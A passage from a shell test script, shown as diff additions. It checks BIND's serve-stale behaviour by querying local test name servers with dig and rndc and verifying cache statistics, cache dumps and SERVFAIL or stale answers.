ns3/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 !TXT" ns3/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 NXDOMAIN" ns3/named.stats.$n.cachedb > /dev/null || ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep "_default: off (stale-answer-ttl=$stale_answer_ttl max-stale-ttl=$max_stale_ttl stale-refresh-time=30)" rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +sleep 2 + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.3 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.3 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check fail of data.example TXT (max-stale-ttl default) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check fail of othertype.example CAA (max-stale-ttl default) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check fail of nodata.example TXT (max-stale-ttl default) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check fail of nxdomain.example TXT (max-stale-ttl default) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify stale cache statistics (max-stale-ttl default) ($n)" +ret=0 +rm -f ns3/named.stats +$RNDCCMD 10.53.0.3 stats > /dev/null 2>&1 +[ -f ns3/named.stats ] || ret=1 +cp ns3/named.stats ns3/named.stats.$n +# Check first 10 lines of Cache DB statistics. After last queries, we expect +# one active TXT RRset, one stale TXT, one stale nxrrset TXT, and one stale +# NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns3/named.stats.$n > ns3/named.stats.$n.cachedb || ret=1 +grep "1 TXT" ns3/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #TXT" ns3/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #Others" ns3/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #!TXT" ns3/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #NXDOMAIN" ns3/named.stats.$n.cachedb > /dev/null || ret=1 + +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +n=$((n+1)) +echo_i "check 'rndc serve-stale on' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 serve-stale on > rndc.out.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep "_default: on (rndc) (stale-answer-ttl=$stale_answer_ttl max-stale-ttl=$max_stale_ttl stale-refresh-time=30)" rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +sleep 2 + +# Check that if we don't have stale data for a domain name, we will +# not answer anything until the resolver query timeout. +n=$((n+1)) +echo_i "check notincache.example TXT times out (max-stale-ttl default) ($n)" +ret=0 +$DIG -p ${PORT} +tries=1 +timeout=3 @10.53.0.3 notfound.example TXT > dig.out.test$n 2>&1 +grep "connection timed out" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.3 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.3 nxdomain.example TXT > dig.out.test$((n+4)) & +$DIG -p ${PORT} @10.53.0.3 notfound.example TXT > dig.out.test$((n+5)) + +wait + +n=$((n+1)) +echo_i "check data.example TXT (max-stale-ttl default) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*30.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check othertype.example CAA (max-stale-ttl default) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "example\..*30.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check nodata.example TXT (max-stale-ttl default) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*30.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check nxdomain.example TXT (max-stale-ttl default) ($n)" +ret=0 +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*30.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# The notfound.example check is different than nxdomain.example because +# we didn't send a prime query to add notfound.example to the cache. +n=$((n+1)) +echo_i "check notfound.example TXT (max-stale-ttl default) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# Now test server with serve-stale answers disabled. +# +echo_i "test server with serve-stale disabled" + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache longttl.example TTL (serve-stale answers disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.4 longttl.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache data.example TTL (serve-stale answers disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.4 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache othertype.example CAA (serve-stale answers disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.4 othertype.example CAA > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "othertype\.example\..*2.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nodata.example TXT (serve-stale answers disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.4 nodata.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nxdomain.example TXT (serve-stale answers disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.4 nxdomain.example TXT > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify prime cache statistics (serve-stale answers disabled) ($n)" +ret=0 +rm -f ns4/named.stats +$RNDCCMD 10.53.0.4 stats > /dev/null 2>&1 +[ -f ns4/named.stats ] || ret=1 +cp ns4/named.stats ns4/named.stats.$n +# Check first 10 lines of Cache DB statistics. After prime queries, we expect +# two active TXT RRsets, one active Others, one nxrrset TXT, and one NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns4/named.stats.$n > ns4/named.stats.$n.cachedb || ret=1 +grep "2 TXT" ns4/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 Others" ns4/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 !TXT" ns4/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 NXDOMAIN" ns4/named.stats.$n.cachedb > /dev/null || ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.4 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep "_default: off (stale-answer-ttl=$stale_answer_ttl max-stale-ttl=$max_stale_ttl stale-refresh-time=30)" rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +sleep 2 + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.4 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.4 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.4 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.4 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check fail of data.example TXT (serve-stale answers disabled) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check fail of othertype.example TXT (serve-stale answers disabled) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check fail of nodata.example TXT (serve-stale answers disabled) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check fail of nxdomain.example TXT (serve-stale answers disabled) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify stale cache statistics (serve-stale answers disabled) ($n)" +ret=0 +rm -f ns4/named.stats +$RNDCCMD 10.53.0.4 stats > /dev/null 2>&1 +[ -f ns4/named.stats ] || ret=1 +cp ns4/named.stats ns4/named.stats.$n +# Check first 10 lines of Cache DB statistics. After last queries, we expect +# one active TXT RRset, one stale TXT, one stale nxrrset TXT, and one stale +# NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns4/named.stats.$n > ns4/named.stats.$n.cachedb || ret=1 +grep "1 TXT" ns4/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #TXT" ns4/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #Others" ns4/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #!TXT" ns4/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #NXDOMAIN" ns4/named.stats.$n.cachedb > /dev/null || ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +# Dump the cache. +n=$((n+1)) +echo_i "dump the cache (serve-stale answers disabled) ($n)" +ret=0 +rndc_dumpdb ns4 -cache || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "stop ns4" +stop_server --use-rndc --port ${CONTROLPORT} ns4 + +# Load the cache as if it was five minutes (RBTDB_VIRTUAL) older. Since +# max-stale-ttl defaults to a week, we need to adjust the date by one week and +# five minutes. +LASTWEEK=`TZ=UTC perl -e 'my $now = time(); + my $oneWeekAgo = $now - 604800; + my $fiveMinutesAgo = $oneWeekAgo - 300; + my ($s, $m, $h, $d, $mo, $y) = (localtime($fiveMinutesAgo))[0, 1, 2, 3, 4, 5]; + printf("%04d%02d%02d%02d%02d%02d", $y+1900, $mo+1, $d, $h, $m, $s);'` + +echo_i "mock the cache date to $LASTWEEK (serve-stale answers disabled) ($n)" +ret=0 +sed -E "s/DATE [0-9]{14}/DATE $LASTWEEK/g" ns4/named_dump.db.test$n > ns4/named_dump.db.out || ret=1 +cp ns4/named_dump.db.out ns4/named_dump.db +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "start ns4" +start_server --noclean --restart --port ${PORT} ns4 + +n=$((n+1)) +echo_i "verify ancient cache statistics (serve-stale answers disabled) ($n)" +ret=0 +rm -f ns4/named.stats +$RNDCCMD 10.53.0.4 stats #> /dev/null 2>&1 +[ -f ns4/named.stats ] || ret=1 +cp ns4/named.stats ns4/named.stats.$n +# Check first 10 lines of Cache DB statistics. After last queries, we expect +# everything to be removed or scheduled to be removed. +grep -A 10 "++ Cache DB RRsets ++" ns4/named.stats.$n > ns4/named.stats.$n.cachedb || ret=1 +grep "#TXT" ns4/named.stats.$n.cachedb > /dev/null && ret=1 +grep "#Others" ns4/named.stats.$n.cachedb > /dev/null && ret=1 +grep "#!TXT" ns4/named.stats.$n.cachedb > /dev/null && ret=1 +grep "#NXDOMAIN" ns4/named.stats.$n.cachedb > /dev/null && ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +# +# Test the server with stale-cache disabled. +# +echo_i "test server with serve-stale cache disabled" + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache longttl.example TXT (serve-stale cache disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.5 longttl.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache data.example TXT (serve-stale cache disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.5 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*2.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache othertype.example CAA (serve-stale cache disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.5 othertype.example CAA > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "othertype\.example\..*2.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nodata.example TXT (serve-stale cache disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.5 nodata.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nxdomain.example TXT (serve-stale cache disabled) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.5 nxdomain.example TXT > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*2.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify prime cache statistics (serve-stale cache disabled) ($n)" +ret=0 +rm -f ns5/named.stats +$RNDCCMD 10.53.0.5 stats > /dev/null 2>&1 +[ -f ns5/named.stats ] || ret=1 +cp ns5/named.stats ns5/named.stats.$n +# Check first 10 lines of Cache DB statistics. After serve-stale queries, +# we expect two active TXT RRsets, one active Others, one nxrrset TXT, and +# one NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns5/named.stats.$n > ns5/named.stats.$n.cachedb || ret=1 +grep "2 TXT" ns5/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 Others" ns5/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 !TXT" ns5/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 NXDOMAIN" ns5/named.stats.$n.cachedb > /dev/null || ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.5 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep "_default: off (not-cached)" rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +sleep 2 + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.5 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.5 othertype.example CAA > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.5 nodata.example TXT > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.5 nxdomain.example TXT > dig.out.test$((n+4)) + +wait + +n=$((n+1)) +echo_i "check fail of data.example TXT (serve-stale cache disabled) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check fail of othertype.example CAA (serve-stale cache disabled) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check fail of nodata.example TXT (serve-stale cache disabled) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check fail of nxdomain.example TXT (serve-stale cache disabled) ($n)" +ret=0 +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify stale cache statistics (serve-stale cache disabled) ($n)" +ret=0 +rm -f ns5/named.stats +$RNDCCMD 10.53.0.5 stats > /dev/null 2>&1 +[ -f ns5/named.stats ] || ret=1 +cp ns5/named.stats ns5/named.stats.$n +# Check first 10 lines of Cache DB statistics. After serve-stale queries, +# we expect one active TXT (longttl) and the rest to be expired from cache, +# but since we keep everything for 5 minutes (RBTDB_VIRTUAL) in the cache +# after expiry, they still show up in the stats. +grep -A 10 "++ Cache DB RRsets ++" ns5/named.stats.$n > ns5/named.stats.$n.cachedb || ret=1 +grep -F "1 Others" ns5/named.stats.$n.cachedb > /dev/null || ret=1 +grep -F "2 TXT" ns5/named.stats.$n.cachedb > /dev/null || ret=1 +grep -F "1 !TXT" ns5/named.stats.$n.cachedb > /dev/null || ret=1 +grep -F "1 NXDOMAIN" ns5/named.stats.$n.cachedb > /dev/null || ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +# Dump the cache. +n=$((n+1)) +echo_i "dump the cache (serve-stale cache disabled) ($n)" +ret=0 +rndc_dumpdb ns5 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +# Check that expired records are not dumped. +ret=0 +grep "; expired since .* (awaiting cleanup)" ns5/named_dump.db.test$n && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Dump the cache including expired entries. +n=$((n+1)) +echo_i "dump the cache including expired entries (serve-stale cache disabled) ($n)" +ret=0 +rndc_dumpdb ns5 -expired || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Check that expired records are dumped. +echo_i "check rndc dump expired data.example ($n)" +ret=0 +awk '/; expired/ { x=$0; getline; print x, $0}' ns5/named_dump.db.test$n | + grep "; expired since .* (awaiting cleanup) data\.example\..*A text record with a 2 second ttl" > /dev/null 2>&1 || ret=1 +awk '/; expired/ { x=$0; getline; print x, $0}' ns5/named_dump.db.test$n | + grep "; expired since .* (awaiting cleanup) nodata\.example\." > /dev/null 2>&1 || ret=1 +awk '/; expired/ { x=$0; getline; print x, $0}' ns5/named_dump.db.test$n | + grep "; expired since .* (awaiting cleanup) nxdomain\.example\." > /dev/null 2>&1 || ret=1 +awk '/; expired/ { x=$0; getline; print x, $0}' ns5/named_dump.db.test$n | + grep "; expired since .* (awaiting cleanup) othertype\.example\." > /dev/null 2>&1 || ret=1 +# Also make sure the not expired data does not have an expired comment. +awk '/; answer/ { x=$0; getline; print x, $0}' ns5/named_dump.db.test$n | + grep "; answer longttl\.example.*A text record with a 600 second ttl" > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "stop ns5" +stop_server --use-rndc --port ${CONTROLPORT} ns5 + +# Load the cache as if it was five minutes (RBTDB_VIRTUAL) older. +cp ns5/named_dump.db.test$n ns5/named_dump.db +FIVEMINUTESAGO=`TZ=UTC perl -e 'my $now = time(); + my $fiveMinutesAgo = 300; + my ($s, $m, $h, $d, $mo, $y) = (localtime($fiveMinutesAgo))[0, 1, 2, 3, 4, 5]; + printf("%04d%02d%02d%02d%02d%02d", $y+1900, $mo+1, $d, $h, $m, $s);'` + +n=$((n+1)) +echo_i "mock the cache date to $FIVEMINUTESAGO (serve-stale cache disabled) ($n)" +ret=0 +sed -E "s/DATE [0-9]{14}/DATE $FIVEMINUTESAGO/g" ns5/named_dump.db > ns5/named_dump.db.out || ret=1 +cp ns5/named_dump.db.out ns5/named_dump.db +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "start ns5" +start_server --noclean --restart --port ${PORT} ns5 + +n=$((n+1)) +echo_i "verify ancient cache statistics (serve-stale cache disabled) ($n)" +ret=0 +rm -f ns5/named.stats +$RNDCCMD 10.53.0.5 stats #> /dev/null 2>&1 +[ -f ns5/named.stats ] || ret=1 +cp ns5/named.stats ns5/named.stats.$n +# Check first 10 lines of Cache DB statistics. After last queries, we expect +# everything to be removed or scheduled to be removed. +grep -A 10 "++ Cache DB RRsets ++" ns5/named.stats.$n > ns5/named.stats.$n.cachedb || ret=1 +grep -F "#TXT" ns5/named.stats.$n.cachedb > /dev/null && ret=1 +grep -F "#Others" ns5/named.stats.$n.cachedb > /dev/null && ret=1 +grep -F "#!TXT" ns5/named.stats.$n.cachedb > /dev/null && ret=1 +grep -F "#NXDOMAIN" ns5/named.stats.$n.cachedb > /dev/null && ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +################################################ +# Test for stale-answer-client-timeout (1.8s). # +################################################ +echo_i "test stale-answer-client-timeout (1.8)" + +n=$((n+1)) +echo_i "updating ns3/named.conf ($n)" +ret=0 +copy_setports ns3/named2.conf.in ns3/named.conf +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "restart ns3" +stop_server --use-rndc --port ${CONTROLPORT} ns3 +start_server --noclean --restart --port ${PORT} ns3 + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (stale-answer-ttl=3 max-stale-ttl=3600 stale-refresh-time=0)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache data.example TXT (stale-answer-client-timeout) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nodata.example TXT (stale-answer-client-timeout) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 nodata.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "delay responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt slowdown > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache data.slow TXT (stale-answer-client-timeout) ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.3 data.slow TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > 